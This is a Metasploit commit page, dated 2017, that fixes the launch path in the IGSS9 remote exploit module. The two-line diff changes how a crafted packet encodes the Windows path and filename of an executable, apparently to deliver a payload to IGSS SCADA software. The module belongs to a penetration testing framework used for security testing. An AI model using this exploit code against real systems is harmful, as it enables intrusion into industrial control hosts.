Land #8650, igss9 launch path

land pr to fix launch path in the igss9 exploit
bug/bundler_fix
David Maloney 2017-07-14 14:39:38 -05:00
commit 0fde6c6b42
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
1 changed files with 2 additions and 2 deletions

View File

@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
pkt << "\x00\x00"
pkt << "\x0A"
pkt << "\x00"*31
pkt << "#{base}Documents and Settings\\All Users\\Application Data\\7T\\#{filename}\""
pkt << "\x00"*143
pkt << "#{base}#{filename}\""
pkt << "\x00"*163 #only for 1 caracter + .exe (i.exe for example)
return pkt
end